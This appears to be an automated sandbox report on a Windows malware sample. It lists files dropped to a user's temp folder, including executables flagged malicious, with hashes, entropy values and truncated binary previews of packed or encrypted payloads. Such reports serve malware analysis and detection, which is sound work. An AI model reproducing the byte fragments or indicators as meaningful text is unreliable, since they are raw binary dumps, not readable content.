Preview:	.O.L..Q.HP.....g'V.,3?...p7;6}...9...<.B..C.f.JK.HF. .....7.C...p.o....:@....[v%.k.6.e..D.Y.(.p....t.[... ../l...$.6......U.6..Ye.Jw}h...i......l....P..s. .;..Z..O..\|....4...{.U.-..s.:Hbs!E.C...Md.x.b %....N.r.-1....3.z.^v..m.a.5.j........jy.dq..D...z...).74..b..Y..x....p.c@.z{....&.D..j.{..........`...^.G........Rpgf..+3........%.i.......A....wde......I1.3........Lq.fe...Jdr.+./.,7......v....}.Fr.P.......5cEZ.p.@.....#B.....L...Td......c.....X...........92 N..zn.N.....g.....CMG...:.X......i...MW....T>}%C....>..@.S.+.&.R.......a....D.~......."...... ...z....[.!....r..C.D..1[.}S..zC....C..gv..3../q...S........(..9M./[.X..t.w.Y..l.T'...$..L.>n........I:\.".i..D(..w....}7;.....2.n!X..l.........#.........D.QA...0p.e$/..7 .{/..H{3..i.U@....ye.....]..o....b.]+......i.$..$..^siT:..{....s...).p..G.C.8..J:.?...@"D.JY=.+["kSq..M..."?.`..r]......\|QT~dB..c..O..$.C...l...z..1.......m.W......k..`......HY2...Z..]....... ....>f...

C:\Users\user\AppData\Local\Temp\Alt

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	104448
Entropy (8bit):	5.172930596796904
Encrypted:	false
SSDEEP:	768:sc/mex/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVx:/PdKaj6iTcPAsAhxW
MD5:	BE1780E619FC600C90159E321A7BCBB9
SHA1:	C710D9B6E5843AD64355C032D4835707B245170E
SHA-256:	DBA6C4B6BEB02F24A6B4F3C7892605A06A8D99D5F65366C021B1337F1D192852
SHA-512:	F0BB5EB234DD25FBB7D7107839CBC9E72CBD1E269CA5F4445E245CBAC4CD8E6DD8966BB4DB08C0B0C88AB22E4A78E46CC3323E201E31E15E0E6E9D82C416D0ED
Malicious:	false
Preview:	................................................................................................................................................................................................b........\... ... \|....................................................................L...........I.....................................................................................0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F................?......Y@.....@.@......P?...........................(#...pqrstuvwxyz{$--%"!' .&,[\.....`abcdefghijkmno]......_..................................................................................................................................................1L..2L..2L..2L.$2L.42L.@2L.H2L.T2L.\2L.l2L.t2L.\|2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..3L..3L. 3L.,3L.43L.<3L.T3L.`3L.l3L..3L...J..3L..3L..3L..3L..3L..3L..3L..4L..4L.$4L.44L.D4L.T4L.l4L..4L..4L..4L..4L..4L..4L..4L..4L..4L..5L...J..5L.45L.P5L.p5L..5L..5L..5L..5L..6L.$6L.<6L.P6L.h6L..6L..6L..6L..6L

C:\Users\user\AppData\Local\Temp\Articles

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	268
Entropy (8bit):	4.968398681802287
Encrypted:	false
SSDEEP:	6:1qjvVg3F+X32+hZCt7HSbYwClS6CSNEcixNU:1yGSG+fCtJfjEvq
MD5:	41B7CDB6E286EE0E44962C8987B91D3C
SHA1:	E57E0B12ABC823CB91D3ACFA32AD63230405057D
SHA-256:	43F8E40249EC2FC185FDC323451FB72384EC9FF5910BD927C89CE8C41CACB58B
SHA-512:	B4423FD2C9D40D3715F93C6E130AF4B81CAA0B3BB3D23AF542D7043E6B91CAB1CCDDDBD2ECE8656736E4A3C594BAD99436432F4BD2EA2EA133FF381DCB8248CA
Malicious:	false
Preview:	cocks........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..

C:\Users\user\AppData\Local\Temp\Attractions

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	141312
Entropy (8bit):	6.686197497967684
Encrypted:	false
SSDEEP:	3072:fEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnj0nEoXnmowS2uI:sMVIPPL/sZ7HS3zcNPj0nEo3tb2j
MD5:	2ED9FFBA1FEA63AD6D178AEA296ED891
SHA1:	E0D1BB0AF918F8DDEE3FB3D593CAF0FC52C77709
SHA-256:	21B6E909F647CC2B1ADB6945ACEDA0EE2CB3DF2C91641D7609FFAB2DB6A40FA1
SHA-512:	52524AD966A8D72BB53ECBA0AC5EE5DC0DB6BE0569CC0E7E0C2D03B5266465C5162AD1048AD1B827E3BDCF985D0932E19336C2D5179BCD7E655E87BABB421055
Malicious:	false
Preview:	.U...........tB.E..M.}.G.}..H.E.;}.\|..%.......t.;.....v..Fh.............RY...}..}.........E...@..P.u.V.u..u............V.......;E...&....}..t.f.......f#......f;.u.....E...@..P.u.V.u..u..G........t............}......F\|.M.+..........C.........M.f9C...........]..e.....C.......%..........E.............U.......8....E...%....=....u".M................%.....M..........E.;.U...C.]........U..........L.............M.,K......K...;.............K......f;.w..F<.....E.............f;.w..F<.....E.;..............E..]..j.....C......E.U.......E.......C.3.U.E..(t..U...5u..E...........~3..E.........U...d......E.........U...N3..E.........U..E........;................+.....U.....+K.....+K..U.E..u..E......}......E..E...y...%.....E......]..E......E.....=....u<..C..].%...........E...........E............E.......]..E....E.}...]..Y.]..........r;.}.........L..............M.,K......K...;.t..U.......U....3..}..E...............E....M.F\|.}.+.;.w.Q.u.W.6n.......u..M.....E..?.E......<.....

C:\Users\user\AppData\Local\Temp\Beaches

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	data
Category:	dropped
Size (bytes):	62464
Entropy (8bit):	7.997732291588885
Encrypted:	true
SSDEEP:	1536:OC2t1VFGBsTxn/fkC+a+kem/B7BKtrFhBzd6g/4k:OC2j+u/CXoJ7ctrfxn/h
MD5:	50CB864F887F934B80CC62A6BB08D611
SHA1:	C23F38262D04019CF198D4499DD95945FE078EC4
SHA-256:	B2F79588B9EC05A7520F42382EA47F596AEB82A83AA4BF3426DB5AA64ABF877A
SHA-512:	9F68238A297F61C48380CE6867AFB929A231AB88CA836E00400B182F3CF5EED99E69B38A60CBFA578FFBF50D5C3326A6E8ECEFDF719FA8FBB99F1FC4C799E283
Malicious:	false
Preview:	.3.\|...zit..ct.]!....).1o......>4...?c._...3...bd..t.[(FiSi._...2.%...".....!P...c.Y ..k...\O.k..i..}...r&..r.........Y.hTy4...n."....4..=T......A.{...b<_.4./..+g.(.g.WK..)s..........js..y.i.Y.q8.\..<.6.........S......!..hP..<.f.\|\|.Y..d:8...i.i.T.'5..g.U..B..%..O....fg.v.8.Cp.W....(..3...J?. P$O...:u.Q....K.m.....N.b.A.e.M.7...{. C6U..(<_6y.QV....?..4...^.~.....A4.....U<..^....Y..n}.Y..h.).....Y#u...Y>.u.O.v....:..#..0......$KN.j.gK.(.x4......50.X....*m......\Od.K.}CN....n/."w(.Ru.6...6..\y}.{..w./..U...,&......`<..<....X:@$Ea.....4.....P..>........F..t<.M1C....`..F7EE.....A.m.W.......19.".?H...Q.....0.!K.).W..U.J=h}J... .n..L&5D....'F- s.e...v...@...'.Iwv.IcHPH..w..?..9.5#..C..I0.a.,.D.b.\|....~........\|9..........3....l_........B`G.UH..I.E......z&..t.M........E.,.&.[..Y..l.G...Ll..W>.3.i..B...S..8V.:\W.............$.c+@-..N/hd.YH.M..8L...WC..IX...?...?!k.F.b.....CLN..C.\..........J....i.....o...o..e.Y.....K..UL.]....K.v...y..e..:..X#.m.

C:\Users\user\AppData\Local\Temp\Cooked

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	59392
Entropy (8bit):	6.612657669946948
Encrypted:	false
SSDEEP:	1536:FC5HRu+OoQjz7nts/M26N7oKzYkBvRmLORuCYm9PrpmES6:AhVOoQ7t8T6pUkBJR8CThpmES6
MD5:	A5CA22529355B052CBCCB045EC8172A1
SHA1:	12F5D5871B07A1EABB9B57753432FC59680830D2
SHA-256:	E434C2A8351E6517F35FFA6D38542390AD0A905BC23FAC64E7D61680AE7CEB67
SHA-512:	AF9D158F1590FB96C1FB7DD1635FE9D1D7528FC3349068363F169907411EE488E2BF6AC03CE851189DBF24FDED3504A574FFF51B5CE6D41E06D8AB9360FC099E
Malicious:	false
Preview:	.E........E.Pj.V.u..E.........I...tV.E.....uM.U..$.........@..@.......t.........$........................t........3.@...3..3..Y3._^[....U...4.M..V.u...u..M...)M...3.@....W...t....tz...t....t..E...)M.PV.i.....t].}........t+M...tK.x..tEj,.E..E.0...j.P.X......E......E.P...t+M.j.V.0....I...t..M..E...3.@..3._^....U..U..E......y..........t...=....}.........t.....2.]...U......L.M.SVW.[s..P.L$$.s...L$..3.u..\|$ .....................t&...t!.D$...)M.PV.p............]..t$..T.......t....u/f9..<M.u.h.)M........f9..,M.u.h.)M...W.W...3.9..t+M...z...f9...q......t+M.h.....D$...2..YP.L$...r..3..D$(0...j,P.D$4P.AW...D$$....D$L.D$(.D$,.....D$P....P3.P.D$.V.0....I..........D$0...........D$4%.....D$...y&3.f9.......W...D$0.....\|$P..\|..Y.D$P.L.D$4..@t......y.......t........t..........t.......D$4.t...u.....D$,.....D$4.D$(P3.P.D$.V.0....I...t3..~*......t.3.PV...\|$..t.3.Pj..D$..0....I...t.3.C..3...D$..(.u.j.P.0...t$ ..0.......3..L$$.).u.j.Q.0..W..0....._^..[..]...U..Q.M...E.P.u...)M..Z.....t,.E

C:\Users\user\AppData\Local\Temp\Enrolled

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	data
Category:	dropped
Size (bytes):	83982
Entropy (8bit):	7.99794941439563
Encrypted:	true
SSDEEP:	1536:SL5dqhmZ4lVzAf9EFl407V6Lf4wXM3wmosIAUZ8DYZyxSr1Pum:WqU2zOmFl40RwfdM3Ros/URcxgmm
MD5:	B0830E2CE03D5BC821D5136F5D8B4D5E
SHA1:	99840A43C60501C4F1F0151EE11798C7FA395591
SHA-256:	D5916524E70C85211005E2E7851E8250BF46ADD8C28FD501DB4BCFBE9EE1ADEE
SHA-512:	58F230B27771DA357658231E2E7445E7D13239CDB0D10D4CD5FA81267DF6EA4883C23139CE41F4892E64B6EE3CD67176C52375E9710823133B7CE20D0EB62934
Malicious:	false
Preview:	...U.,..l..I.E.l./@..8......%...i.\w6TJ....Vr...s.Y7"u......T......Z.f..Cv.X...th.....N..Ao.."C..K...(....1;WL...7..59...z..C-+..OD.N.7@.}.]......z;......^.w.2ee(.4.....FS....;B...0.#......f.r8...Y...ao.)../..0......;..ANl...f..m.=[].K.FQ4n...,........5?......E,..o../.}B..<.........te.._..s..}......._-...&.nOj..........[..p.[....CD..',...r.})e..!...K.?.x.SK.fs.{.u..E3V..8.."...^L.)J....:.................[1.........\|.p......Ou.n....+...P...}.&C..!..,.V.P...#..v.P..P..6.....F....I..8...Q...gP)V@..U.......S.wG..k'5>..i`...KH...\ ..y....................ql...x.....&....o..=...V.H.=W.....LO..#...._H..t.....0..;.&Ie...?.z...@....s......2$r.Am..).A..J...U.5,.(M..._...]h..0...{....1..G....R...L.u....M.....:.q..%.!O....q.\|.:....xy....w"N.c..y.t....Y.).-...T#...2=.nB.dM.M...+.p.....M....1_..M...k..Wp.e......M.J.5w].........R.P......(....Z.}b.K...\|...vZ.V.p..........D9........t...k.....ge.m.rVj..;..m;D..P.rR..`'5..9.LXY........d.RJ+..)

C:\Users\user\AppData\Local\Temp\Fingers

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	119633
Entropy (8bit):	6.0874087589267925
Encrypted:	false
SSDEEP:	1536:sgarB/5el3EYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:sgarB/5elDWy4ZNoGmROL7F1G7ho2kOb
MD5:	7D6337C50FA5EB0681D5B094E58E3541
SHA1:	BD1A7A54D4F4382AACA1FFAF4A690799CA6081F7
SHA-256:	791C72AEB0CAF7FC14F0420F053C0698D27D68265810762470307EA489568780
SHA-512:	A24F3EADC814C87F2D592F64467CC0894347ADE35924507E81719104C0B9F293A76A51D92B5329CB57574B6EE65C71ED1BBE30D61BE041E1AE522ADDE617912F
Malicious:	false
Preview:	.KillTimer.7.PostQuitMessage...SetFocus....MoveWindow....DefWindowProcW....MessageBoxW...GetUserObjectSecurity.-.OpenWindowStationW..h.GetProcessWindowStation...SetProcessWindowStation.(.OpenDesktopW..N.CloseWindowStation..J.CloseDesktop....SetUserObjectSecurity...GetWindowRect.6.PostMessageW....MapVirtualKeyW..&.GetDlgCtrlID..d.GetParent...GetClassNameW.;.CharUpperBuffW....EnumChildWindows..{.SendMessageTimeoutW.m.ScreenToClient....GetWindowTextW..,.GetFocus....AttachThreadInput...GetWindowThreadProcessId..!.GetDC.e.ReleaseDC...GetWindowLongW....InvalidateRect....EnableWindow....IsWindowVisible...IsWindowEnabled...IsWindow..#.GetDesktopWindow....EnumWindows...DestroyWindow.K.GetMenu...GetClientRect...BeginPaint....EndPaint..U.CopyRect....SetWindowTextW..'.GetDlgItem..s.SendDlgItemMessageW...EndDialog...MessageBeep...DialogBoxParamW...LoadStringW.!.VkKeyScanW..=.GetKeyState.B.GetKeyboardState....SetKeyboardState....GetAsyncKeyState..v.SendInput.0.keybd_event...SystemParametersInfoW...F

C:\Users\user\AppData\Local\Temp\Maternity

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	data
Category:	dropped
Size (bytes):	59392
Entropy (8bit):	7.997035686695416
Encrypted:	true
SSDEEP:	1536:F5ORWtjA85b/PQW6wzxYtMbs8VKKXsgN1yFi3eb7:Op85T6tIDVKKXZMoeb7
MD5:	BF1A63801FCE643D91670984E50AA26C
SHA1:	96CC6E514ED73B0F0816884E6019F3F3C31F6A80
SHA-256:	96E885D5F09D9B01BBBB20C5DA4005E84683F65EE061EB2D22F41DA96A1A48A0
SHA-512:	D741447E64E376442A4FBEE480A94C494219292BB70DF6A346C5244C12F647BDC074F13F53A0FC32202C1D8D6A37C7BAA9CC0E750020492B99781D9CEEE3F943
Malicious:	false
Preview:	.O.L..Q.HP.....g'V.,3?...p7;6}...9...<.B..C.f.JK.HF. .....7.C...p.o....:@....[v%.k.6.e..D.Y.(.p....t.[... ../l...$.6......U.6..Ye.Jw}h...i......l....P..s. .;..Z..O..\|....4...{.U.-..s.:Hbs!E.C...Md.x.b %....N.r.-1....3.z.^v..m.a.5.j........jy.dq..D...z...).74..b..Y..x....p.c@.z{....&.D..j.{..........`...^.G........Rpgf..+3........%.i.......A....wde......I1.3........Lq.fe...Jdr.+./.,7......v....}.Fr.P.......5cEZ.p.@.....#B.....L...Td......c.....X...........92 N..zn.N.....g.....CMG...:.X......i...MW....T>}%C....>..@.S.+.&.R.......a....D.~......."...... ...z....[.!....r..C.D..1[.}S..zC....C..gv..3../q...S........(..9M./[.X..t.w.Y..l.T'...$..L.>n........I:\.".i..D(..w....}7;.....2.n!X..l.........#.........D.QA...0p.e$/..7 .{/..H{3..i.U@....ye.....]..o....b.]+......i.$..$..^siT:..{....s...).p..G.C.8..J:.?...@"D.JY=.+["kSq..M..."?.`..r]......\|QT~dB..c..O..$.C...l...z..1.......m.W......k..`......HY2...Z..]....... ....>f...

C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Download File

Process:	C:\Users\user\Desktop\CLaYpUL3zw.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1062983
Entropy (8bit):	7.969270980145046
Encrypted:	false
SSDEEP:	12288:00giFMExCeGp6bA+2lC/S9zD0upW2+IHxb7A8G5jMVTn1Xx1MwT6/OkwyR4UzU+J:/ieH66juI80CT1DMa4LwxIM9HM/U1OK
MD5:	A3E9A86D6EDE94C3C71D1F7EEA537766
SHA1:	DDFBF23CBA3ADC0BCAD33162D1BDBEE8CCD12294
SHA-256:	A7B3B6CA09E92530EF0BD156B0C2C0213E957129BFB83B8A99D2387932BB2CA5
SHA-512:	AF6391847FF626FF88FF0583ADDE9536EFF25026ACBC0D0165CE27286A8F145CBB0B5059A294D7A14CB497C60B96E9A5DE88D41A3EE6A339FDB554DE51790F0C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@.................................t.....@.................................@..........."u..............8+...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc..."u.......v..................@..@.reloc............... ..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Pot

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	133120
Entropy (8bit):	6.593902201612224
Encrypted:	false
SSDEEP:	3072:2+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9cob:2mVnjphfhnvO5bLezWWt/Dd314V14Zgz
MD5:	998B4B6FEEE76BEB9CA721DCD2B8A4E0
SHA1:	6556CA455B7F7B3B36F5A703746B17D2D662F82B
SHA-256:	A3718216E2D86886D768FDE1FE869B9F84FA96309ADC8D83CAF1F17B939F76BF
SHA-512:	A8E92A0CF4CA465313BFE27D860F956F3777B3202A8B1FDFB03DB4AAAD567F3546C525F40D85414D04806D964B650637846FD1F7CCA6736B8C8E327B342C3617
Malicious:	false
Preview:	.~..v..F..H..u....N.P...j...P......u......k1...>3._.F.....^]...U..E.VW.@..H..0.2...P...*...P.\....u......+1...>3._.F.....^]...U..V.u....W.~..v..F..H.......V.P.J..2.....P.......P.....u.......0...>3._.F.....^]...U....SVW.}.3.]..]..]..w....r!.G.j).H..M.......u......M.A......r..G.j).H.......u..W....E....r..O.j).I..k.....u..9....O.....E..I..(.....$..E..G..p....G....u..F..u..u....G.SQ.......P.x....u......./...>3._.F.....^[....U..M.3.9A.v..A....q..VWP......u....../...>3._.F.....^]...U.....e..SVW.}.........j...j.S.X....E.....x..v..@....Mq.....E..M.Q.M.Q.M.Q.M.Q.M.QP.............E.3..e..Fj..E.E.VPS.u..........M..#/...E.3.V.E.E.VPS.}.u..........M.......E.j..E.E.VPS.}.u.........M.......E.j..E.E.VPS.}.u.........M......E.j..E.E.VPS.}.u..].......M......8.......'.3.B.W....H..\|1...D1.t..@8.P..\|1...D1.t..@8.@.._^3.[....U........=.(M..SVW.L$.uA...@..\|....T..t..R83.C.Z..\|....T..t..R8.u....B.......3..^..>.Q.....(M..0....M.3..C.\|$..y..v..I.......;.u.....2.....!............M..

C:\Users\user\AppData\Local\Temp\Promise

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	7.9975626227798315
Encrypted:	true
SSDEEP:	1536:cQ36ddIs69BLJSqA8PWfAx/lruBD5hf6akJGg1lg+xM4Zl:cQlF9oAjrO4G+a+xMyl
MD5:	832042466014761981CDAF193F0E7041
SHA1:	301225CDE7E7DE3A10E98D7C9DE191D85AAC0099
SHA-256:	FF5E35AC52EA87EC94D3847112D9F3083B3BF252FA74C76D453EE118BA1A2BE8
SHA-512:	2A49ECD5DE8702A71267463B8CD130F1AA91D1E3F8D9EB866B8C58C8FC46374F98AECDCDCD071D207F734A61D082AAA56170152EEDA3C0E445C0A5CCD6A50260
Malicious:	false
Preview:	..2O;.....=F.u...~X.^tu4ey?...v............E=.....U..x...'...=.g.....=..".......C-..}...8...8.Br..g]....M.-.>.r,...I.......!.5..f.4...FV.U.,.%zY...~.ysqV..V...I...?...)..zRsa...#.G..C.pqe.b{.:%k.y...)..Y..-<.n.J/<gkN..m.\.L.I.VIC q.rc..YMn%<....O.......4.....J..C,s..U.{N.z.pAU..dX...M.7.$1...a..&..\|89...}).g...F.e.p.....&..P..t.0......64.$)...K..f2.!.P.P...A...~..G..!.M.f.f..._...i..U.<..@9 .....2.FN.`....fT..#[...\9.0.kO.S.^A.....K:.....a.AES2...ps$.8F5... UF......(.X=Ha............s.rb.._f.A...q....#.....M..T...qj:...$0Y...P...r..o..].m.f.>.1_\|.p76.........a..6.>G.a.....c...]u+.$....v. 3[-e...D.kw. ..Y.O.a.BsW....E...bw`..Y.7>...<......e.....a..E...Vy..#u3..A.YW......~......w.-P..)S..4.J...k..JZ.\.HR..V...y....q..jB..@.G@-..Q5."[.&A.J!....F.'J4..>.......< ........@..c5/K.y.....S......?.3.Q...2M........?~....GQ0.k8.{5[.P\WY..7....k.wc.JA.k..77"^a.n...I.#....J.M..p!....t=z..?W .Iqi...b..!PDv...)3.....;,#.uH2...X....+..<.G;hM......$.Npr.e....\|.

C:\Users\user\AppData\Local\Temp\Rat

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	data
Category:	dropped
Size (bytes):	100352
Entropy (8bit):	7.9982884825197775
Encrypted:	true
SSDEEP:	1536:qIl7/T+lGxZhNlCtHtyAtgvWscqQlxaDOgASCZ5FSJqz7D6qAK8KxGBpM:xZL33R0HtyA+RQlKOmxw/D8KxGBpM
MD5:	CD00C53F92FBED3C8947B7205A4247ED
SHA1:	87D5486B7EFD98DCC92B4393D20D39D12CB6487E
SHA-256:	EDD50131DA69EA2747D0BCA3ECD4293778BEB5491FBF02BF6D4ADA4B2E9F01C1
SHA-512:	D1C7AAD1E7F376C7622031D36A3C1F2452B693E5FA976B35CFC22045180388B55218FA8C2B0270C2F66C996B805112C6D82F312642809D9051F350AE1220A85E
Malicious:	false
Preview:	..t!@xF.....U...-p.....)..1^....Y.....w...z..(.....b.$\X..2..#.....6c..@...\.E$R.u....Z.]..<`..v...9.a.W..N?=...6..d._......9.~.5~.....Jd...~0h'.............bf.6....Q.I........J.U.d......I...\.'J..m..).n.,S.../................$.j.....,L.-....`s2..2...V........U.6.\./U~...y...K..2.i.z...l.k.EQ..+.=.....E]T.\Y.?.C..'.m...hP.'.M..mc....:}.e6-^.g..$...o.k.b]!@...Vl.,.e.O.....9S.?..MA......\|...U?].....D..f....D=....za.Nf......46.I......>..../T(6...L..B..Y.8.3B..J.[S..@........%..^..e$.ck......b.h.....Y.$:.K_p}c.;i..C.}..O.D \|.&...f\|n.......yq....#\|..B..T..F....t..R~)d)<.N.0......tp.9..~Co.....W.n.(1.).y...%_.......Y....D(..b....>..)^....dGX..iA.9...n.H8...pn...D...\.......a5.t\<1.N..=.......v..e.q.M.W..]....a.-7~*BO.k..j...\|3.}_2jz.A3.X.-3(.fN\.4.>J......yG...om......f....v..uCP...+g...i.IU{R..Be8.....o5...=...k.n`(..m..w..S.9.@..l.ri...U?..ctD+...+S...u.e;..G.G.=3S,.S.......q....M.U/z.>..y..k....e..J&4$.z.....[B..J.Ax0..!]fr....M..Ry

C:\Users\user\AppData\Local\Temp\Receiver

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	88064
Entropy (8bit):	5.844749716437728
Encrypted:	false
SSDEEP:	1536:xj62SfuVGHj1vtK7h6R8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwug:xjfTq8QLeAg0Fuz08XvBNbjaAtg
MD5:	7A1D29A789B8F5CA0F4186AA1DBC3BC2
SHA1:	A9A3169FF90FA2BFFB8D96F95FFDB3A70386B476
SHA-256:	A513073A8C2E7F41CF78374498C2D980CD8DA473246AF5475C53C1D7FA7BA0DE
SHA-512:	AD90D9521F68AFFDA3AD4CCA4ECF1A72C3CFCB465F3D60FB8BCB02FFACD3ABD9F1DBF03C022F13FC68DA74080355CE36C0B13D4E511E0857AF60C30B2032D3A0
Malicious:	false
Preview:	..F.. r.^].U..QS.].V.u..U..C.W....Cx.<H....b....}....0....{P.........w.E.;........C\|......E.;...(.....2.....%....=....u....#....#....................%....=....u....#....#.....................L..............M.,K.;.t-.....K...;.t ......K....@.K...;..........;.u......E.;}...F...+U......u..~.+.N;S\|sa........E.=....w..C<.]......]..].......w..C<....9M.u1.........~..[\|N;.s.............f;.u......j.X....._^[..U..QQSV.u...M.W..xQ;u.}L.D..+..E....E....P.......Y..u.j..+...E..u...HQW.R...E....3.f..8.M..E..9..j.X_^[..U....SVW....3.B.....#.M.......sQ.......u%f..u....L.............j..T>.X....3...f..t...........T8.t..E.........j.Y..".t... ...f...........E......}..E......U.3.E.B.......f;.u<....}..t&%....=....u.........#.#..............;...........j.Xf;..........}..tZ..%....j.[=....u.........#.#....................%....=....u"............%....................;.r.;...r...3.B...j.Yf....'....E._^[..E......L.....E....E.,K..E.3.f;].....E..E.....2....$...I.j.Xf;..........K.<.......<....

C:\Users\user\AppData\Local\Temp\Reflect

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	Microsoft Cabinet archive data, 488808 bytes, 9 files, at 0x2c +A "Cooked" +A "Receiver", ID 6076, number 1, 29 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	488808
Entropy (8bit):	7.998475465922649
Encrypted:	true
SSDEEP:	12288:ohQLaKCeh787wflZffn5DMrTn1GF1MwTYcOkxFdryB:PaenflZ1iT1CMaLLxFde
MD5:	97942C5C8DFF98863EFC71FC15CE0257
SHA1:	14D6BA8E5C3B7BE1BE540CA7ECAA075D5C505E3B
SHA-256:	B4A2CBEAA8185681ED75BDF2C34020CCAA9405A42A47C4C3D17EC6E907FD9152
SHA-512:	7D1FABB306D3CD38985CE6472DF17973AEE7F4D56902D48A1CF690BBAF8D5BA71D83DD79136FCA635AB51813FC3978E9871DECAD0E07D46BEE5A998E5CB77D6F
Malicious:	false
Preview:	MSCF....hu......,......................................Y<. .Cooked..X.........Y<. .Receiver..(...@.....Y<. .Attractions.Q....h.....Y<. .Fingers..D..Q;.....Y<. .User.....Q......Y<. .Pot.....Q......Y<. .Alt.....Q......Y<. .Articles..T..] .....Y<. .Specialty./.s6.R..CK...xT..0\|f.$9$.3.."..:Z...pI.. L.Bp..........s.h.BO.9lF..V..Z..V........./.D..$"mw<Q.b2.....$...?...}Y{..../..;0R.......G...H....E.........r..wX..A)$KZ.........f..<../....Z.............ul....Z+..i)={.'.....PW..6OO5<..s.(....k.c...N.s.Z.g.."E..KH....k....%:6A;Cj...^.O..P.m.8._.3b.......?...Z..T..V.O...I....kEA.E&.\|..}...."...7...0."....Ep(...`8....Y;t+..y...&K ]RS.h.4...0AP.<Z..J..V.Pwmx.FE...,.uJm./.......k ...V....B....!u..ix.a.H.;.......gGM......bs..D..7....Q.....Id.S..4.{....*.(7..:.ym....wB)z..^C....15%\|.Ru.....\.[8.....'@9j~..E...p&.]..)0...Lzz%..m....w..Z8.Og...d.....%.B.D...t..~$6.... .C..Qs..z..............h..=..)....4H+`.v"5W.....h.....X..>O...}5m.lj......&..U?.1.....WN...,tC.IN.6+....

C:\Users\user\AppData\Local\Temp\Set-up.exe

Download File

Process:	C:\Users\user\Desktop\CLaYpUL3zw.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	6851208
Entropy (8bit):	6.451509958428788
Encrypted:	false
SSDEEP:	98304:ty1CDpiB/weoINcERH7q/70/ske9dKVyz8SC:jViB/NooB7edGG8SC
MD5:	2A99036C44C996CEDEB2042D389FE23C
SHA1:	4F1E624BCC030E44722DE26B72C8156BF57E14E8
SHA-256:	73AA5EE19F0EA048DCFF2F44D6FD5AC41C13E2D7E61371459E756836F72CAD43
SHA-512:	6907CD0E47293C8C96345ED00F2F3FA2241CE1671EE73A599837857BFB39F6C7E373AAD843CC78FB550D2DB10BDFE066A021CEC4C8A49AECDF06A7E71EDADEDD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 70%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5mg...............(.hK...h..2............K...@...........................i......h...@... ..............................`e..-....................h.......e.`L...........................0d......................he. ............................text....gK......hK.................`..`.data...D(....K..*...lK.............@....rdata........O.. ....O.............@..@.eh_framdM....d..N....d.............@..@.bss.....1... e..........................idata...-...`e.......e.............@....CRT....0.....e......2e.............@....tls..........e......4e.............@....reloc..`L....e..N...6e.............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Specialty

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	152576
Entropy (8bit):	6.433958275406592
Encrypted:	false
SSDEEP:	3072:UZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05mjD:UK5vPeDkjGgQaE/loUDtf0aD
MD5:	D49F624EA007E69AFE1163955DDBA1BB
SHA1:	EE35A9CEAB1F6A40694B26094FDC7727658293D2
SHA-256:	4052653CEDFD2F560DA3BEE9825F88F60DBD053ABB3C064F3D19D98863B2962C
SHA-512:	63B1629E79C35E59923D4A1C12B93FEB45241EB0D2B59A03B9EB14BF76DAA82BA124710E8F4AA157D0C63BADFDCFFD916F049B85DE4B52CAA143F0DD32AD71E8
Malicious:	false
Preview:	hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..\|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..

